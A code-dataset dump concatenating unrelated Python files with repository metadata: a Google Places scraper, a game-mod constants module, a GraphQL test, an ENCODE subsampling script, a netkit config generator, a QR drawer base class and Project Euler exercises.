                            filter_include = is_filters_include(page_content_text, filters_include_list)
                            if not filter_include:
                                print('Filter include')
                                continue
                        results.append(render_result(place, is_web))
                if not query_result.has_next_page_token or is_web:
                    break
                # Wait before requesting the next page of results.
                sleep(30)
                print('Next page token: {}'.format(query_result.next_page_token))
                query_result = google_places_api.nearby_search(
                    pagetoken=query_result.next_page_token
                )
    return results
def render_result(place, is_web=False):
    """Convert one Google Places result into a row.

    Web rows carry the formatted address; CSV-export rows follow the header
    written by scrape() (Name, Company Domain, Phone Number, Company owner,
    Lifecycle stage, Country, City), with the owner taken from the
    NOTIFY_EMAIL environment variable and Country/City left blank.
    """
    if is_web:
        return [place.name, place.website, place.formatted_address,
                place.international_phone_number, '']
    owner = os.environ.get('NOTIFY_EMAIL')
    return [place.name, place.website, place.international_phone_number,
            owner, 'Subscriber', '', '']
def is_filters_exclude(place_website_content, filters_exclude_list):
    """Return True if any exclude word occurs in the page content.

    Filter words are escaped with re.escape so terms containing regex
    metacharacters (e.g. "C++") are matched literally instead of raising
    re.error, which the previous unescaped concatenation did.
    """
    for exclude in filters_exclude_list:
        # Match the word anywhere within a line of the page source.
        if re.search(r'[^"\r\n]*' + re.escape(str(exclude)) + r'[^"\r\n]*', place_website_content):
            return True
    return False
def is_filters_include(place_website_content, filters_include_list):
    """Return True if any include word occurs in the page content.

    Filter words are escaped with re.escape so terms containing regex
    metacharacters (e.g. "C++") are matched literally instead of raising
    re.error, which the previous unescaped concatenation did.
    """
    for include in filters_include_list:
        # Match the word anywhere within a line of the page source.
        if re.search(r'[^"\r\n]*' + re.escape(str(include)) + r'[^"\r\n]*', place_website_content):
            return True
    return False
def send_error(user):
    """Email the admin address (ERROR_EMAIL env var) that *user*'s run failed."""
    recipient = os.environ.get('ERROR_EMAIL')
    subject = '{} had a FATAL ERROR!'.format(str(user))
    message = "Look into heroku logs and notify user"
    send_mail(recipient, subject, message)
if __name__ == '__main__':
    # NOTE(review): scrape() requires (query, city, filters_exclude,
    # filters_include, user, uid) but is called with no arguments here, so
    # running this module directly raises TypeError — confirm the intended
    # entry point / argument source.
    scrape()
| 5,504 | 0 | 138 |
993feb043393adf3e48cbc1d5e09178f6b6122bf | 2,382 | py | Python | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | 1 | 2016-04-03T13:31:39.000Z | 2016-04-03T16:48:26.000Z | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | """ XVM (c) www.modxvm.com 2013-2017 """
#####################################################################
# constants
# Shared commands
# Markers only commands
# Battle events
# Invalidation targets
# Spotted statuses
| 34.521739 | 127 | 0.689337 | """ XVM (c) www.modxvm.com 2013-2017 """
#####################################################################
# constants
# Shared commands
class XVM_BATTLE_COMMAND(object):
    """Command identifiers for battle data exchange.

    The ``xvm_battle.*`` entries are requests/notifications handled on the
    Python side; the ``xvm.as.*`` / ``AS_*`` entries are presumably pushed to
    the ActionScript (Flash) UI — confirm against the command dispatcher.
    """
    REQUEST_BATTLE_GLOBAL_DATA = "xvm_battle.request_battle_global_data"
    XMQP_INIT = "xvm_battle.xmqp_init"
    BATTLE_CTRL_SET_VEHICLE_DATA = "xvm_battle.battle_ctrl_set_vehicle_data"
    CAPTURE_BAR_GET_BASE_NUM_TEXT = "xvm_battle.capture_bar_get_base_num_text"
    MINIMAP_CLICK = "xvm_battle.minimap_click"
    AS_RESPONSE_BATTLE_GLOBAL_DATA = "xvm.as.response_battle_global_data"
    AS_XMQP_EVENT = "xvm.as.as_xmqp_event"
    AS_UPDATE_PLAYER_STATE = "xvm.as.update_player_state"
    AS_UPDATE_DEVICE_STATE = "xvm.as.update_device_state"
    AS_TEAMS_HP_CHANGED = "xvm.as.teams_hp_changed"
    AS_SNIPER_CAMERA = "xvm.as.sniper_camera"
    AS_AIM_OFFSET_UPDATE = "xvm.as.aim_offset_update"
    AS_ON_TARGET_CHANGED = "xvm.as.on_target_changed"
    AS_MOVING_STATE_CHANGED = "xvm.as.as_moving_state_changed"
    AS_STEREOSCOPE_TOGGLED = "xvm.as.as_stereoscope_toggled"
# Markers only commands
class XVM_VM_COMMAND(object):
    """Command identifiers used by the vehicle-markers component."""
    # Flash -> Python
    LOG = "xfw.log"
    INITIALIZED = "initialized"
    AS_CMD_RESPONSE = "xvm_vm.as.cmd_response"
# Battle events
class XVM_BATTLE_EVENT(object):
    """Event names emitted during battle (arena updates and XMQP traffic)."""
    ARENA_INFO_INVALIDATED = "arena_info_invalidated"
    XMQP_CONNECTED = 'xvm_battle.xmqp_connected'
    XMQP_MESSAGE = 'xvm_battle.xmqp_message'
# Invalidation targets
class INV(object):
    """Bit flags naming which pieces of per-vehicle data need refreshing.

    Combine with ``|``; the ALL_* masks group related flags.
    """
    NONE = 0x00000000
    VEHICLE_STATUS = 0x00000001 # ready, alive, not_available, stop_respawn
    #PLAYER_STATUS = 0x00000002 # isActionDisabled, isSelected, isSquadMan, isSquadPersonal, isTeamKiller, isVoipDisabled
    SQUAD_INDEX = 0x00000008
    CUR_HEALTH = 0x00000010
    MAX_HEALTH = 0x00000020
    MARKS_ON_GUN = 0x00000040
    SPOTTED_STATUS = 0x00000080
    FRAGS = 0x00000100
    HITLOG = 0x00010000
    ALL_VINFO = VEHICLE_STATUS | SQUAD_INDEX | FRAGS # | PLAYER_STATUS
    ALL_VSTATS = FRAGS
    ALL_ENTITY = CUR_HEALTH | MAX_HEALTH | MARKS_ON_GUN
    # Covers every flag below bit 16; HITLOG (0x10000) is deliberately outside
    # this mask — presumably refreshed separately; confirm at the call sites.
    ALL = 0x0000FFFF
# Spotted statuses
class SPOTTED_STATUS(object):
    """String states for a vehicle's spotted status."""
    NEVER_SEEN = 'neverSeen'
    SPOTTED = 'spotted'
    LOST = 'lost'
    DEAD = 'dead'
class INT_CD(object):
    """Internal numeric item identifiers."""
    # NOTE(review): 1273 is presumably the stereoscope device's compact
    # descriptor id in the game client — confirm against the client data.
    STEREOSCOPE = 1273
| 0 | 2,015 | 138 |
41c9e613638a94d05eb2e8ceab952f4ed37e7164 | 2,187 | py | Python | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | 1 | 2020-10-04T10:01:45.000Z | 2020-10-04T10:01:45.000Z | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | null | null | null | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | null | null | null | from onto.attrs import attribute
from onto.models.base import Serializable
from collections import namedtuple
# Lightweight record describing one GraphQL operation binding:
# (op_type, name, graphql_object_type).
graph_schema = namedtuple('graph_schema', ['op_type', 'name', 'graphql_object_type'])
| 21.441176 | 85 | 0.582533 | from onto.attrs import attribute
from onto.models.base import Serializable
class H(Serializable):
    """Fixture Serializable with two documented attributes; converted to a
    GraphQL object type by the test below."""
    # Plain int attribute with a one-line doc.
    i = attribute.Attribute(type_cls=int, doc="I am 'i'.")
    # Property-style str attribute with a multi-line doc.
    j = attribute.PropertyAttribute(
        type_cls=str,
        doc="""I am 'j'. See next line.
    This is my second line.
    """
    )
from collections import namedtuple
# Lightweight record describing one GraphQL operation binding:
# (op_type, name, graphql_object_type).
graph_schema = namedtuple('graph_schema', ['op_type', 'name', 'graphql_object_type'])
def test__schema_cls_from_attributed_class():
    """Convert the attributed class H to a GraphQL object type and mount it
    in query/subscription schemas served via stargql.

    Requires the onto, graphql, gql and stargql packages; the server start
    at the bottom is commented out, so importing/running this only builds
    the app object.
    """
    # import asyncio
    # loop = asyncio.get_event_loop()
    from onto.models.utils import _graphql_object_type_from_attributed_class
    attributed = H
    graphql_schema = _graphql_object_type_from_attributed_class(attributed)
    # Unused placeholder handler.
    async def sub(parent, info, **kwargs):
        pass
    #
    from graphql import GraphQLObjectType
    query_schema = GraphQLObjectType(
        name='Query',
        fields={
            'h': graphql_schema
        }
    )
    from gql import query, subscribe
    # Resolver for the 'h' query field; returns a static H-shaped dict.
    @query
    async def h(parent, info, **kwargs):
        return {
            'i': 1,
            'j': 'one'
        }
    # NOTE(review): this graph_schema record is built and immediately
    # discarded — dead statement, or a missing assertion?
    graph_schema(op_type='Query', name='h', graphql_object_type=graphql_schema)
    # Subscription resolver; reuses the name `h` after the @query decorator
    # has (presumably) registered the previous one — confirm gql semantics.
    @subscribe
    async def h(parent, info, **kwargs):
        # Register topic
        # Listen to topic
        for i in range(5):
            import asyncio
            await asyncio.sleep(i)
            yield {
                'h': {
                    'i': i,
                    'j': f"number is {i}"
                }
            }
    subscription_schema = GraphQLObjectType(
        name='Subscription',
        fields={
            'h': graphql_schema
        }
    )
    from graphql import GraphQLSchema
    schema = GraphQLSchema(
        query=query_schema,
        subscription=subscription_schema
    )
    from stargql import GraphQL
    # Startup hook: creates a module-global Queue `q` (not read elsewhere
    # in this test).
    async def on_startup():
        from asyncio.queues import Queue
        global q
        q = Queue()
    async def shutdown():
        pass
    app = GraphQL(
        schema=schema,
        on_startup=[on_startup],
        on_shutdown=[shutdown]
    )
    # import uvicorn
    # uvicorn.run(app, port=8080, debug=True)
    # return app
| 1,734 | 205 | 46 |
efd92e9172080bbf7288d421524737cd0652549d | 2,303 | py | Python | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 261 | 2017-10-18T04:59:35.000Z | 2022-03-28T08:15:33.000Z | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 272 | 2018-05-03T22:57:38.000Z | 2022-03-25T22:26:22.000Z | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 142 | 2017-08-23T23:44:14.000Z | 2022-03-18T20:53:26.000Z | #!/usr/bin/env python
import sys
import os
import argparse
from encode_lib_common import (
assert_file_not_empty, get_num_lines, log, ls_l, mkdir_p, rm_f,
run_shell_cmd, strip_ext_ta)
from encode_lib_genomic import (
subsample_ta_pe, subsample_ta_se)
if __name__ == '__main__':
main()
| 34.373134 | 82 | 0.604863 | #!/usr/bin/env python
import sys
import os
import argparse
from encode_lib_common import (
assert_file_not_empty, get_num_lines, log, ls_l, mkdir_p, rm_f,
run_shell_cmd, strip_ext_ta)
from encode_lib_genomic import (
subsample_ta_pe, subsample_ta_se)
def parse_arguments():
parser = argparse.ArgumentParser(
prog='ENCODE DCC control TAG-ALIGN subsampler.'
'This script does not check if number of reads in TA is higher than '
'subsampling number (--subsample). '
'If number of reads in TA is lower than subsampling number then '
'TA will be just shuffled.')
parser.add_argument('ta', type=str,
help='Path for control TAGALIGN file.')
parser.add_argument('--paired-end', action="store_true",
help='Paired-end TAGALIGN.')
parser.add_argument('--subsample', default=0, type=int,
help='Number of reads to subsample.')
parser.add_argument('--out-dir', default='', type=str,
help='Output directory.')
parser.add_argument('--log-level', default='INFO',
choices=['NOTSET', 'DEBUG', 'INFO',
'WARNING', 'CRITICAL', 'ERROR',
'CRITICAL'],
help='Log level')
args = parser.parse_args()
if not args.subsample:
raise ValueError('--subsample should be a positive integer.')
log.setLevel(args.log_level)
log.info(sys.argv)
return args
def main():
# read params
args = parse_arguments()
log.info('Initializing and making output directory...')
mkdir_p(args.out_dir)
if args.paired_end:
subsampled_ta = subsample_ta_pe(
args.ta, args.subsample,
non_mito=False, mito_chr_name=None, r1_only=False,
out_dir=args.out_dir)
else:
subsampled_ta = subsample_ta_se(
args.ta, args.subsample,
non_mito=False, mito_chr_name=None,
out_dir=args.out_dir)
log.info('Checking if output is empty...')
assert_file_not_empty(subsampled_ta)
log.info('List all files in output directory...')
ls_l(args.out_dir)
log.info('All done.')
if __name__ == '__main__':
main()
| 1,953 | 0 | 46 |
2101b659c05c618a0d1a94ae66118ffd25c67ab5 | 3,804 | py | Python | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
] | 2 | 2019-03-20T18:04:59.000Z | 2019-07-15T09:09:21.000Z | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
] | null | null | null | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import re
import yaml
from collections import namedtuple, defaultdict
from ipaddress import IPv4Network
from itertools import repeat, combinations
from functools import update_wrapper
import click
BoundIface = namedtuple('BoundIface', 'host if_no')
NetedIface = namedtuple('NetedIface', 'host if_no ip netmask')
DomainAsoc = namedtuple('DomainAsoc', 'iface domain')
IFACE_STATEMENT_REGEXP = r'([a-z0-9_]+)\[(\d+)\]\s*=\s*"([A-Z])'
pass_data = click.make_pass_decorator(object)
@click.group()
@click.option(
"--labconf",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of lab.conf",
)
@click.option(
"--netz",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of netz.yml",
)
@click.pass_context
@click.command()
@pass_data
@click.command()
@pass_data
@click.command()
@pass_data
if __name__ == "__main__":
main()
| 26.978723 | 90 | 0.652471 | #!/usr/bin/env python3
import re
import yaml
from collections import namedtuple, defaultdict
from ipaddress import IPv4Network
from itertools import repeat, combinations
from functools import update_wrapper
import click
BoundIface = namedtuple('BoundIface', 'host if_no')
NetedIface = namedtuple('NetedIface', 'host if_no ip netmask')
DomainAsoc = namedtuple('DomainAsoc', 'iface domain')
IFACE_STATEMENT_REGEXP = r'([a-z0-9_]+)\[(\d+)\]\s*=\s*"([A-Z])'
def get_conf_contents(path="./lab.conf"):
with open(path) as f:
raw = f.readlines()
stripped = map(lambda l: l.rstrip("\n"), raw)
return filter(bool, stripped)
def parse_iface_statement(statement):
result = re.match(IFACE_STATEMENT_REGEXP, statement)
if result:
host, if_no, domain = result.groups()
return DomainAsoc(iface=BoundIface(host=host, if_no=if_no), domain=domain)
else:
raise ValueError("Not an interface statement")
def get_domain_subnets(path="./subnets.yml"):
return {k: IPv4Network(v) for k, v in yaml.safe_load(open(path)).items()}
pass_data = click.make_pass_decorator(object)
@click.group()
@click.option(
    "--labconf",
    required=True,
    type=click.Path(exists=True, dir_okay=False, resolve_path=True),
    help="Location of lab.conf",
)
@click.option(
    "--netz",
    required=True,
    type=click.Path(exists=True, dir_okay=False, resolve_path=True),
    help="Location of netz.yml",
)
@click.pass_context
def cli(ctx, labconf, netz):
    """Group entry point: parse lab.conf and assign IPs per collision domain.

    Stores the per-domain lists of ``NetedIface`` records on ``ctx.obj`` so
    the subcommands can consume them via ``pass_data``.
    """
    subnets = get_domain_subnets(path=netz)
    ifaces_by_domain = defaultdict(list)
    for line in get_conf_contents(path=labconf):
        try:
            assoc = parse_iface_statement(line)
        except ValueError:
            # Non-interface lines (lab metadata, etc.) are simply skipped.
            continue
        ifaces_by_domain[assoc.domain].append(assoc.iface)

    def assign_ips(domain, ifaces):
        # Hand out consecutive host addresses from the domain's subnet.
        subnet = subnets[domain]
        addresses = subnet.hosts()
        return [NetedIface(*iface, next(addresses), subnet.netmask) for iface in ifaces]

    neted = {domain: assign_ips(domain, ifaces)
             for domain, ifaces in ifaces_by_domain.items()}
    ctx.obj = neted.values()
@click.command()
@pass_data
def ifup(data):
    """Print shell lines that append an ``ifconfig`` call to each host's .startup file."""
    for domain in data:
        for iface in domain:
            up_cmd = "ifconfig eth{0} {1} netmask {2} up".format(
                iface.if_no, iface.ip, iface.netmask)
            print("echo '{0}' >> {1}.startup".format(up_cmd, iface.host))
@click.command()
@pass_data
def gateway_routes(data):
    """Print shell lines that give every pc host a default route via its domain's router."""
    for domain in data:
        # The first host whose name contains "r" is treated as the router.
        gateway = next(iface for iface in domain if "r" in iface.host)
        route_cmd = "route add default gw %s" % gateway.ip
        for iface in domain:
            if "pc" in iface.host:
                print("echo '%s' >> %s.startup" % (route_cmd, iface.host))
@click.command()
@pass_data
def check_all_connections(data):
    """Print ping-test lines covering every unordered pair of configured interfaces.

    For each pair, the first interface's host pings the second's IP; the
    commands are appended to ``_test/<host>.test`` files.
    """
    # Flatten the per-domain lists with one comprehension.  The original
    # ``[i for i in sum(data, [])]`` copied the accumulator list for every
    # domain (quadratic) and wrapped it in an identity comprehension.
    neted_ifaces = [iface for domain in data for iface in domain]
    pings_by_host = defaultdict(list)
    for src, dst in combinations(neted_ifaces, 2):
        pings_by_host[src.host].append(dst.ip)
    for host, targets in pings_by_host.items():
        for ip in targets:
            ping_cmd = "ping {0} -c 1 -W 1".format(ip)
            print("echo '{0}' >> _test/{1}.test".format(ping_cmd, host))
def main():
    """Attach the subcommands to the group (in their original order) and run the CLI."""
    for command, alias in ((ifup, None),
                           (gateway_routes, "gw"),
                           (check_all_connections, "cta")):
        cli.add_command(command, alias)
    cli()


if __name__ == "__main__":
    main()
| 2,642 | 0 | 180 |
374933fc53917d78ec37e81b2924dd9f94764c6b | 135 | py | Python | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #! /usr/bin/env python
import sys
# preference for the included libs
sys.path.insert(0, 'libs')
from editor import main
main.main()
| 15 | 35 | 0.733333 | #! /usr/bin/env python
import sys
# preference for the included libs
sys.path.insert(0, 'libs')
from editor import main
main.main()
| 0 | 0 | 0 |
054db30675a5f4ea79156e97c0906b1d49520cbb | 1,158 | py | Python | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import abc
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from qrcode.image.base import BaseImage
from qrcode.main import ActiveWithNeighbors
class QRModuleDrawer(abc.ABC):
"""
QRModuleDrawer exists to draw the modules of the QR Code onto images.
For this, technically all that is necessary is a ``drawrect(self, box,
is_active)`` function which takes in the box in which it is to draw,
whether or not the box is "active" (a module exists there). If
``needs_neighbors`` is set to True, then the method should also accept a
``neighbors`` kwarg (the neighboring pixels).
It is frequently necessary to also implement an "initialize" function to
set up values that only the containing Image class knows about.
For examples of what these look like, see doc/module_drawers.png
"""
needs_neighbors = False
@abc.abstractmethod
| 30.473684 | 83 | 0.707254 | from __future__ import absolute_import
import abc
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from qrcode.image.base import BaseImage
from qrcode.main import ActiveWithNeighbors
class QRModuleDrawer(abc.ABC):
    """Abstract base for objects that paint QR-code modules onto an image.

    Concrete drawers implement ``drawrect(self, box, is_active)``, which
    renders one module into the given box; ``is_active`` tells whether a
    module exists there.  Drawers that set ``needs_neighbors = True`` must
    additionally accept a ``neighbors`` keyword argument describing the
    surrounding pixels.

    Subclasses frequently override ``initialize`` to capture values that
    only the containing Image class knows about.

    For examples of what these look like, see doc/module_drawers.png
    """

    # Set to True in subclasses whose drawrect needs the ``neighbors`` kwarg.
    needs_neighbors = False

    def __init__(self, **kwargs):
        # Extra keyword arguments are accepted (and ignored) so all drawers
        # share a permissive constructor signature.
        pass

    def initialize(self, img: "BaseImage") -> None:
        """Remember the image object this drawer will paint onto."""
        self.img = img

    @abc.abstractmethod
    def drawrect(self, box, is_active: "Union[bool, ActiveWithNeighbors]") -> None:
        ...
| 140 | 0 | 80 |
f50f6421c88a6048b74f4b57e50eb679c1cc0e74 | 1,259 | py | Python | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | """Desafio 80. Ler cinco valores númericos e ir colocando eles na lista de modo ordenado sem usar o método sort"""
# Desafio 80: read five integers and keep ``numeros`` sorted as the values
# arrive, without ever calling list.sort().
numeros = list()
for cont in range(0, 5):
    num = int(input("Escreva um número: "))
    # Generalized insertion: walk to the first element greater than num and
    # insert there (equal values land after their duplicates).  This replaces
    # the original branch ladder that spelled out every position for each of
    # the five iterations, and works for any list length.
    posicao = 0
    while posicao < len(numeros) and numeros[posicao] <= num:
        posicao += 1
    numeros.insert(posicao, num)
print(numeros)
| 26.229167 | 114 | 0.513106 | """Desafio 80. Ler cinco valores númericos e ir colocando eles na lista de modo ordenado sem usar o método sort"""
# Desafio 80: read five integers and keep ``numeros`` sorted as the values
# arrive, without ever calling list.sort().
numeros = list()
for cont in range(0, 5):
    num = int(input("Escreva um número: "))
    # Generalized insertion: walk to the first element greater than num and
    # insert there (equal values land after their duplicates).  This replaces
    # the original branch ladder that spelled out every position for each of
    # the five iterations, and works for any list length.
    posicao = 0
    while posicao < len(numeros) and numeros[posicao] <= num:
        posicao += 1
    numeros.insert(posicao, num)
print(numeros)
| 0 | 0 | 0 |
55152ae4ed033b4f1f9ed1f8bf792107931a99b0 | 785 | py | Python | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | null | null | null | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | 1 | 2021-12-21T11:34:47.000Z | 2021-12-21T11:34:47.000Z | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | 1 | 2021-12-21T10:10:13.000Z | 2021-12-21T10:10:13.000Z | import home
from ws.handler.event.enum import Handler as Parent
| 27.068966 | 53 | 0.598726 | import home
from ws.handler.event.enum import Handler as Parent
class Handler(Parent):
    """Presenter for ``home.event.sleepiness`` events: maps each state to its
    display word and Font Awesome icon class for the enum template."""

    KLASS = home.event.sleepiness.Event
    TEMPLATE = "event/enum.html"
    LABEL = "User is"

    def _get_str(self, e):
        """Return the lowercase state word for *e*, or *e* unchanged when unknown."""
        state = home.event.sleepiness.Event
        for value, word in ((state.Asleep, "asleep"),
                            (state.Awake, "awake"),
                            (state.Sleepy, "sleepy")):
            if e == value:
                return word
        return e

    def get_icon(self, e):
        """Return the icon CSS class for *e*, or *e* unchanged when unknown."""
        state = home.event.sleepiness.Event
        for value, icon in ((state.Asleep, "fas fa-bed"),
                            (state.Awake, "fas fa-business-time"),
                            (state.Sleepy, "fas fa-couch")):
            if e == value:
                return icon
        return e
| 545 | 151 | 23 |
af0b6fe564278c898bbc8ad18ad8f8d7dcf8139c | 324 | py | Python | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | 2 | 2020-06-09T10:35:12.000Z | 2020-06-09T11:32:16.000Z | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | null | null | null | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | null | null | null | i = 3
# Project Euler #7: build the list of the first 10,001 primes in simple_nums
# (the line that follows this block prints the last entry).
#
# Fixes vs. the original: trial division only needs to test odd divisors up
# to sqrt(candidate) — the original scanned every k in range(2, i), which is
# orders of magnitude slower — and the for/else idiom replaces the manual
# "found a divisor" flag variable.  Even candidates are skipped entirely.
simple_nums = [2]
candidate = 3
while len(simple_nums) < 10001:
    for divisor in range(3, int(candidate ** 0.5) + 1, 2):
        if candidate % divisor == 0:
            break
    else:  # no divisor found -> candidate is prime
        simple_nums.append(candidate)
    candidate += 2
print(simple_nums[-1]) | 21.6 | 32 | 0.518519 | i = 3
# Project Euler #7: print the 10,001st prime number.
#
# Fixes vs. the original: trial division only needs to test odd divisors up
# to sqrt(candidate) — the original scanned every k in range(2, i), which is
# orders of magnitude slower — and the for/else idiom replaces the manual
# "found a divisor" flag variable.  Even candidates are skipped entirely.
simple_nums = [2]
candidate = 3
while len(simple_nums) < 10001:
    for divisor in range(3, int(candidate ** 0.5) + 1, 2):
        if candidate % divisor == 0:
            break
    else:  # no divisor found -> candidate is prime
        simple_nums.append(candidate)
    candidate += 2
print(simple_nums[-1])